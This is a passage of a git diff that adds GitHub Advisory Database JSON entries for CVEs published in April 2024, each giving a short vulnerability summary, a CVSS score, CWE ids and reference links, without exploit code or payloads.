"https://nvd.nist.gov/vuln/detail/CVE-2024-26234" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26234" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-phxq-f9jh-xw45/GHSA-phxq-f9jh-xw45.json b/advisories/unreviewed/2024/04/GHSA-phxq-f9jh-xw45/GHSA-phxq-f9jh-xw45.json new file mode 100644 index 00000000000..2c82166a47f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-phxq-f9jh-xw45/GHSA-phxq-f9jh-xw45.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-phxq-f9jh-xw45", + "modified": "2024-04-10T00:30:29Z", + "published": "2024-04-10T00:30:29Z", + "aliases": [ + "CVE-2024-3521" + ], + "details": "A vulnerability was found in Byzoro Smart S80 Management Platform up to 20240317. It has been rated as critical. Affected by this issue is some unknown functionality of the file /useratte/userattestation.php. The manipulation of the argument web_img leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259892. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3521" + }, + { + "type": "WEB", + "url": "https://github.com/garboa/cve_3/blob/main/Upload2.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259892" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259892" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.308509" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T23:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-pjcp-cwxx-6f4x/GHSA-pjcp-cwxx-6f4x.json b/advisories/unreviewed/2024/04/GHSA-pjcp-cwxx-6f4x/GHSA-pjcp-cwxx-6f4x.json new file mode 100644 index 00000000000..9566ad89c4b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-pjcp-cwxx-6f4x/GHSA-pjcp-cwxx-6f4x.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pjcp-cwxx-6f4x", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-3020" + ], + "details": "The plugin is vulnerable to PHP Object Injection in versions up to and including, 2.6.3 via deserialization of untrusted input in the import function via the 'shortcode' parameter. This allows authenticated attackers, with administrator-level access to inject a PHP Object. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3020" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3065296/wp-carousel-free/trunk/includes/class-wp-carousel-free-import-export.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d66df15e-1a0a-49e9-bcf9-67091499b24e?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T05:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-pp2r-p867-hj9h/GHSA-pp2r-p867-hj9h.json b/advisories/unreviewed/2024/04/GHSA-pp2r-p867-hj9h/GHSA-pp2r-p867-hj9h.json new file mode 100644 index 00000000000..d62d3a6e8a6 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-pp2r-p867-hj9h/GHSA-pp2r-p867-hj9h.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pp2r-p867-hj9h", + "modified": "2024-04-09T21:31:58Z", + "published": "2024-04-09T21:31:58Z", + "aliases": [ + "CVE-2024-1587" + ], + "details": "The Newsmatic theme for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.3.0 via the 'newsmatic_filter_posts_load_tab_content'. This makes it possible for unauthenticated attackers to view draft posts and post content.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1587" + }, + { + "type": "WEB", + "url": "https://themes.trac.wordpress.org/browser/newsmatic/1.3.0/inc/template-functions.php#L634" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bd2ea430-48ce-43c3-ba3d-8ef5f91460ce?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-pp2x-pgm4-hc2c/GHSA-pp2x-pgm4-hc2c.json b/advisories/unreviewed/2024/04/GHSA-pp2x-pgm4-hc2c/GHSA-pp2x-pgm4-hc2c.json new file mode 100644 index 00000000000..6525aa301b3 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-pp2x-pgm4-hc2c/GHSA-pp2x-pgm4-hc2c.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pp2x-pgm4-hc2c", + "modified": "2024-04-05T21:32:45Z", + "published": "2024-04-05T21:32:45Z", + "aliases": [ + "CVE-2023-25494" + ], + "details": "\nA potential vulnerability were reported in the BIOS of some Desktop, Smart Edge, and ThinkStation products that could allow a local attacker with elevated privileges to write to NVRAM variables. \n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25494" + }, + { + "type": "WEB", + "url": "https://support.lenovo.com/us/en/product_security/LEN-141775" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T21:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-pppv-cq2v-65wm/GHSA-pppv-cq2v-65wm.json b/advisories/unreviewed/2024/04/GHSA-pppv-cq2v-65wm/GHSA-pppv-cq2v-65wm.json new file mode 100644 index 00000000000..bcb45795568 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-pppv-cq2v-65wm/GHSA-pppv-cq2v-65wm.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pppv-cq2v-65wm", + "modified": "2024-04-06T09:31:03Z", + "published": "2024-04-06T09:31:03Z", + "aliases": [ + "CVE-2024-3363" + ], + "details": "A vulnerability was found in SourceCodester Online Library System 1.0. It has been classified as critical. This affects an unknown part of the file admin/borrowed/index.php. The manipulation of the argument BookPublisher/BookTitle leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259467.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3363" + }, + { + "type": "WEB", + "url": "https://github.com/thisissuperann/Vul/blob/main/Online-Library-System-05" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259467" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259467" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.310429" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-pq39-f58p-6f4p/GHSA-pq39-f58p-6f4p.json b/advisories/unreviewed/2024/04/GHSA-pq39-f58p-6f4p/GHSA-pq39-f58p-6f4p.json new file mode 100644 index 00000000000..37577bd898a --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-pq39-f58p-6f4p/GHSA-pq39-f58p-6f4p.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pq39-f58p-6f4p", + "modified": "2024-04-08T09:31:13Z", + "published": "2024-04-08T09:31:13Z", + "aliases": [ + "CVE-2023-52537" + ], + "details": "Vulnerability of package name verification being bypassed in the HwIms module.\nImpact: Successful exploitation of this vulnerability will affect availability.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52537" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/3" + }, + { + "type": "WEB", + "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202403-0000001667644725" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-prq6-rh2c-gq39/GHSA-prq6-rh2c-gq39.json b/advisories/unreviewed/2024/04/GHSA-prq6-rh2c-gq39/GHSA-prq6-rh2c-gq39.json new file mode 100644 index 00000000000..e4ff9a63231 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-prq6-rh2c-gq39/GHSA-prq6-rh2c-gq39.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-prq6-rh2c-gq39", + "modified": "2024-04-09T00:30:41Z", + "published": "2024-04-09T00:30:41Z", + "aliases": [ + "CVE-2024-31047" + ], + "details": "An issue in Academy Software Foundation openexr v.3.2.3 and before allows a local attacker to cause a denial of service (DoS) via the convert function of exrmultipart.cpp.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31047" + }, + { + "type": "WEB", + "url": "https://github.com/AcademySoftwareFoundation/openexr/issues/1680" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T23:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-prqm-j32h-gr46/GHSA-prqm-j32h-gr46.json b/advisories/unreviewed/2024/04/GHSA-prqm-j32h-gr46/GHSA-prqm-j32h-gr46.json new file mode 100644 index 00000000000..e4b5ed8d08f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-prqm-j32h-gr46/GHSA-prqm-j32h-gr46.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-prqm-j32h-gr46", + "modified": "2024-04-09T09:31:11Z", + "published": "2024-04-09T09:31:11Z", + "aliases": [ + "CVE-2024-31369" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in PenciDesign Soledad.This issue affects Soledad: from n/a through 8.4.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31369" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/soledad/wordpress-soledad-theme-8-4-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T09:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-pv4q-pg8h-7p42/GHSA-pv4q-pg8h-7p42.json b/advisories/unreviewed/2024/04/GHSA-pv4q-pg8h-7p42/GHSA-pv4q-pg8h-7p42.json new file mode 100644 index 00000000000..41161b13f4d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-pv4q-pg8h-7p42/GHSA-pv4q-pg8h-7p42.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pv4q-pg8h-7p42", + "modified": "2024-04-09T03:30:53Z", + "published": "2024-04-09T03:30:53Z", + "aliases": [ + "CVE-2024-30217" + ], + "details": "Cash Management in SAP S/4 HANA does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges. By exploiting this vulnerability, an attacker can approve or reject a bank account application affecting the integrity of the application. Confidentiality and Availability are not impacted.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30217" + }, + { + "type": "WEB", + "url": "https://me.sap.com/notes/3430173" + }, + { + "type": "WEB", + "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T01:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-pv68-rq6c-c32j/GHSA-pv68-rq6c-c32j.json b/advisories/unreviewed/2024/04/GHSA-pv68-rq6c-c32j/GHSA-pv68-rq6c-c32j.json new file mode 100644 index 00000000000..19754c013cb --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-pv68-rq6c-c32j/GHSA-pv68-rq6c-c32j.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pv68-rq6c-c32j", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2504" + ], + "details": "The Page Builder: Pagelayer – Drag and Drop website builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'attr' parameter in all versions up to, and including, 1.8.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2504" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/pagelayer/trunk/main/functions.php?rev=3045444#L1207" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?old_path=/pagelayer/tags/1.8.4&old=3056288&new_path=/pagelayer/tags/1.8.5&new=3056288&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c4884ba9-4448-43b0-93d3-110b719845ea?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-pvvv-mm99-9qf2/GHSA-pvvv-mm99-9qf2.json b/advisories/unreviewed/2024/04/GHSA-pvvv-mm99-9qf2/GHSA-pvvv-mm99-9qf2.json new file mode 100644 index 00000000000..899a3f4a870 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-pvvv-mm99-9qf2/GHSA-pvvv-mm99-9qf2.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pvvv-mm99-9qf2", + "modified": "2024-04-09T21:31:58Z", + "published": "2024-04-09T21:31:58Z", + "aliases": [ + "CVE-2024-1774" + ], + "details": "The Customily Product Personalizer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via user cookies in all versions up to, and including, 1.23.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. We unfortunately could not get in touch with the vendor through various means to disclose this issue.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1774" + }, + { + "type": "WEB", + "url": "https://www.customily.com/woocommerce" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0f8aa38b-85c5-45a7-b5cd-9ecd43a3c340?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-pw55-22x2-xqg6/GHSA-pw55-22x2-xqg6.json b/advisories/unreviewed/2024/04/GHSA-pw55-22x2-xqg6/GHSA-pw55-22x2-xqg6.json new file mode 100644 index 00000000000..6ee019394d4 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-pw55-22x2-xqg6/GHSA-pw55-22x2-xqg6.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pw55-22x2-xqg6", + "modified": "2024-04-07T18:30:30Z", + "published": "2024-04-07T18:30:30Z", + "aliases": [ + "CVE-2024-31280" + ], + "details": "Unrestricted Upload of File with Dangerous Type vulnerability in Andy Moyle Church Admin.This issue affects Church Admin: from n/a through 4.1.5.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31280" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/church-admin/wordpress-church-admin-plugin-4-1-5-arbitrary-file-upload-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T18:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-pw86-gvc3-5wvh/GHSA-pw86-gvc3-5wvh.json b/advisories/unreviewed/2024/04/GHSA-pw86-gvc3-5wvh/GHSA-pw86-gvc3-5wvh.json new file mode 100644 index 00000000000..df94fe7dc4f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-pw86-gvc3-5wvh/GHSA-pw86-gvc3-5wvh.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pw86-gvc3-5wvh", + "modified": "2024-04-08T15:30:33Z", + "published": "2024-04-08T15:30:33Z", + "aliases": [ + "CVE-2024-31812" + ], + "details": "In TOTOLINK EX200 V4.0.3c.7646_B20201211, an attacker can obtain sensitive information without authorization through the function getWiFiExtenderConfig.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31812" + }, + { + "type": "WEB", + "url": "https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/EX200/Leak_getWiFiExtenderConfig/Leak.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-pwvw-3h9f-9875/GHSA-pwvw-3h9f-9875.json b/advisories/unreviewed/2024/04/GHSA-pwvw-3h9f-9875/GHSA-pwvw-3h9f-9875.json new file mode 100644 index 00000000000..f71b3a4e443 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-pwvw-3h9f-9875/GHSA-pwvw-3h9f-9875.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pwvw-3h9f-9875", + "modified": "2024-04-09T18:30:23Z", + "published": "2024-04-09T18:30:23Z", + "aliases": [ + "CVE-2024-20665" + ], + "details": "BitLocker Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20665" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20665" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-693" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-pwwp-53vp-7mv3/GHSA-pwwp-53vp-7mv3.json b/advisories/unreviewed/2024/04/GHSA-pwwp-53vp-7mv3/GHSA-pwwp-53vp-7mv3.json new file mode 100644 index 00000000000..2da14855a81 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-pwwp-53vp-7mv3/GHSA-pwwp-53vp-7mv3.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pwwp-53vp-7mv3", + "modified": "2024-04-08T21:31:16Z", + "published": "2024-04-08T21:31:16Z", + "aliases": [ + "CVE-2024-3465" + ], + "details": "A vulnerability was found in SourceCodester Laundry Management System 1.0. It has been classified as critical. Affected is the function laporan_filter of the file /application/controller/Transaki.php. The manipulation of the argument dari/sampai leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-259746 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3465" + }, + { + "type": "WEB", + "url": "https://github.com/fubxx/CVE/blob/main/LaundryManagementSystemSQL3.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259746" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259746" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312313" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T21:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-pxfw-cxx3-vxv8/GHSA-pxfw-cxx3-vxv8.json b/advisories/unreviewed/2024/04/GHSA-pxfw-cxx3-vxv8/GHSA-pxfw-cxx3-vxv8.json new file mode 100644 index 00000000000..9ae5c2c65b6 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-pxfw-cxx3-vxv8/GHSA-pxfw-cxx3-vxv8.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pxfw-cxx3-vxv8", + "modified": "2024-04-08T15:30:32Z", + "published": "2024-04-08T15:30:32Z", + "aliases": [ + "CVE-2024-28066" + ], + "details": "In Unify CP IP Phone firmware 1.10.4.3, Weak Credentials are used (a hardcoded root password).", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28066" + }, + { + "type": "WEB", + "url": "https://syss.de" + }, + { + "type": "WEB", + "url": "https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-008.txt" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-pxr3-23fx-4vxx/GHSA-pxr3-23fx-4vxx.json b/advisories/unreviewed/2024/04/GHSA-pxr3-23fx-4vxx/GHSA-pxr3-23fx-4vxx.json new file mode 100644 index 00000000000..6cabd92ae30 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-pxr3-23fx-4vxx/GHSA-pxr3-23fx-4vxx.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pxr3-23fx-4vxx", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-26253" + ], + "details": "Windows rndismp6.sys Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26253" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26253" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-q2j3-wpw2-58vq/GHSA-q2j3-wpw2-58vq.json b/advisories/unreviewed/2024/04/GHSA-q2j3-wpw2-58vq/GHSA-q2j3-wpw2-58vq.json new file mode 100644 index 00000000000..47a2ed1175d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-q2j3-wpw2-58vq/GHSA-q2j3-wpw2-58vq.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q2j3-wpw2-58vq", + "modified": "2024-04-08T06:31:30Z", + "published": "2024-04-08T06:31:30Z", + "aliases": [ + "CVE-2024-1752" + ], + "details": "The Font Farsi WordPress plugin through 1.6.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1752" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/7c87fcd2-6ffd-4285-bbf5-36efea70b620" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T05:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-q32p-r22r-wrmj/GHSA-q32p-r22r-wrmj.json b/advisories/unreviewed/2024/04/GHSA-q32p-r22r-wrmj/GHSA-q32p-r22r-wrmj.json new file mode 100644 index 00000000000..2612d71d202 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-q32p-r22r-wrmj/GHSA-q32p-r22r-wrmj.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q32p-r22r-wrmj", + "modified": "2024-04-09T18:30:28Z", + "published": "2024-04-09T18:30:28Z", + "aliases": [ + "CVE-2024-29982" + ], + "details": "Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29982" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29982" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-q36g-c4c7-q48x/GHSA-q36g-c4c7-q48x.json b/advisories/unreviewed/2024/04/GHSA-q36g-c4c7-q48x/GHSA-q36g-c4c7-q48x.json new file mode 100644 index 00000000000..dd5edc69850 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-q36g-c4c7-q48x/GHSA-q36g-c4c7-q48x.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q36g-c4c7-q48x", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2783" + ], + "details": "The GamiPress – The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 6.9.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever 